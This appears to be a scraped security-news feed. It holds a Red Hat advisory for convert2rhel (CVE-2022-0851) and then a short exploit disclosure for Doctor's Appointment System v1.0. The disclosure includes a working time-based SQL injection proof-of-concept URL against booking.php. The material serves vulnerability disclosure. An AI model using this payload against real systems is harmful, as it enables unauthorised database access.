y7ufqykb6gX+qYYCuI0chMWEM/zjHJIbKU3zr0Q2WyGvHR8vs3u4meFQTY3lAjoX  
eMXr/wXuqyLu7ZbIJf1Vs+weM1wxkoi9njqPnZmLXC3Cq8fF4wo/JKEzVJb9Hld9  
+RfN4S775P62QTT/gXi6jzsAdt8HDtk3Z4biP3DjKgwSft+H0WU/6IHAOEbgA07z  
zEaN7sF4JMv3RqR1thK+x82R/xin0yN5hBc+4qvzBcSejqdVSqnuv4+fIDT0KDjy  
i5upNVtRLcVdPqdq0oQKgVIipe37tPZLUpIApDZrMUo+DGVL/8izEWNFtZ1Dcr7o  
DJj9XX0/ND4ybKPaawsUoMDIzn8Qb/mx0tGmrHomqXQdZ+zC/nxz2ZW8ohw/uNWP  
olFRfY5d16G51KN61k8RdrwLhCYtFxrmsmcu9mGpE0MX8vjimnx9NSwd+6ZPEOpV  
a3nUBTdAfvZ6lLs5GG/ON35Dbmncp1TrpPp0O9/W5AJbgNZaJNYhbmUSODlnjNUW  
KA4tX+R0DRJYQuDRf08bB2kBnNxTtNN4GM+50bER7c5O87KX05dDILxUaV3gd8yP  
pK6vmBwNgowIAcJPoS7cYYKwUlSvBDe8+HVK/jVGta0MNtn9wudzSkSp8WWeOOLl  
j56ZxVgO7qY=UxOc  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6269-01

Red Hat Security Advisory 2022-6268-01 - The convert2rhel package provides the Convert2RHEL utility, which performs operating system conversion. During the conversion process, Convert2RHEL replaces all RPM packages from the original Linux distribution with their Red Hat Enterprise Linux versions.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: convert2rhel security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:6268-01  
Product:           Convert2RHEL  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6268  
Issue date:        2022-08-31  
CVE Names:         CVE-2022-0851  
====================================================================  
1. Summary:

An update for convert2rhel is now available for Convert2RHEL for RHEL-7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Convert2RHEL for RHEL-7 - noarch

3. Description:

The convert2rhel package provides the Convert2RHEL utility, which performs  
operating system conversion. During the conversion process, Convert2RHEL  
replaces all RPM packages from the original Linux distribution with their  
Red Hat Enteprise Linux versions.

Security Fix(es):

* convert2rhel: Activation key passed via command line by code  
(CVE-2022-0851)

Bug Fix(es):

* Conversion fails due to gnome-documents-libs conflict (BZ#2043724)  
* Using dbus API for RHSM registration to safely pass the activation key  
* Verifying GPG key for UBI repositories

Deprecation:

* Deprecated `-f|--password-from-file` parameter option

Enhancement(s):

* Checking if a new version of convert2rhel is available  
* Warning if multiple authentication sources are specified  
* Fixed logging error with unavailable RHSM certificate  
* Fixed gnome-documents-libs package conflict  
* Fixed handling shim-x64 package protection on non-UEFI systems

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2043724 - Conversion fails due to gnome-documents-libs conflict  
2060217 - CVE-2022-0851 convert2rhel: Activation key passed via command line by code

6. JIRA issues fixed (https://issues.jboss.org/):

RHELC-700 - Move yum clean metadata and yum makecache to the beginning of conversion  
RHELC-701 - Unknown tag in rpm query format call  
RHELC-702 - Incorrectly logging error with unavailable RHSM certificate  
RHELC-703 - Use dbus API for RHSM registration  
RHELC-704 - Update grub bootloader images  
RHELC-705 - Check for a new version available  
RHELC-706 - Add the ability to take the activation key from a config file rather than the command line  
RHELC-707 - Check whether the user has specified multiple authentication sources and warn if so  
RHELC-708 - Remove UEFI condition from shim-x64 workaround

7. Package List:

Convert2RHEL for RHEL-7:

Source:  
convert2rhel-1.0-1.el7.src.rpm

noarch:  
convert2rhel-1.0-1.el7.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2022-0851  
https://access.redhat.com/security/updates/classification/#moderate

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYw+LzNzjgjWX9erEAQiQrxAAhQYSSCd/8idpwx/5UdPzZsvKcZujBl6Q  
anuflYs/d/P5V6bnw4YOzgVxtVzHAzQ5ea3fWKvaA2GO680cQWTYHPvlFzA0yVeS  
/teg8pmcQ8RQAiU3nZ7xa2G8YRfZReTARADQbUeZBF3DA+FzVc0zxP+bplRDeNTN  
Jd9JZlYFs17F2VIJLJou944mr8en3X2Du7i5Ui0fHMBxmB0kHhmb3rD9kccDjKQP  
KzIZFl+Tn+EXyw5wNG0zXPvBuqDEMDWH2y6QYMyYDLxGRFQfaulxdVzg++BQbKD1  
GAewTQzBhxpgvo5yWV4M9BmhrwoKxu8hMHIsx32VaAvNRG+wXJxHutwdV7vlyvf9  
qU/ApWpNeriVQC2jmTC+4arAslZyz3JixPSF1ybsVr07MmB/xTNh+ywaAXH8KBac  
+Q38S5h/bsp4dCWKjzjDofUoolTa6bRP2Hl8J6nHvfY5jKZb+2Nkg2LE1ouwniQ5  
j907YHXHUO8EEhEbWxR+kVAOTItIrwBa/3znnXeN7ipmCJOIvvoRcNAkTDFgo5mV  
oEJx5jrabmawCbIWYbHGh6oVZ8jrj9T8WEl5x0frNFl4bZ2S2rHjS6DNCs+eAa61  
5ZkeC1Emr3oLmT7jQkqpztpgeiQGzIymVWH2ItD74niCJ4Z8psN05/OTYkU6wqqG  
qwyhzhQSx/0=PhnH  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6268-01

Doctor's Appointment System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of SQL injection in this version is attributed to Soham Bakore and Nakul Ratti in February of 2021.

    # Exploit Title: SQLi - Doctor's Appointment System v1.0# Google Dork: N/A# Date: 7/13/2022# Exploit Author: Abdullah Zaid - @_aznull# Vendor Homepage:https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html# Software Link:https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip# Version: 1.0# Tested on: Linux# CVE : CVE-2022-36201POC:http://localhost/edoc/patient/booking.php?id=1%20AND%20(SELECT%203436%20FROM%20(SELECT(SLEEP(10)))dZls)

Tag

#linux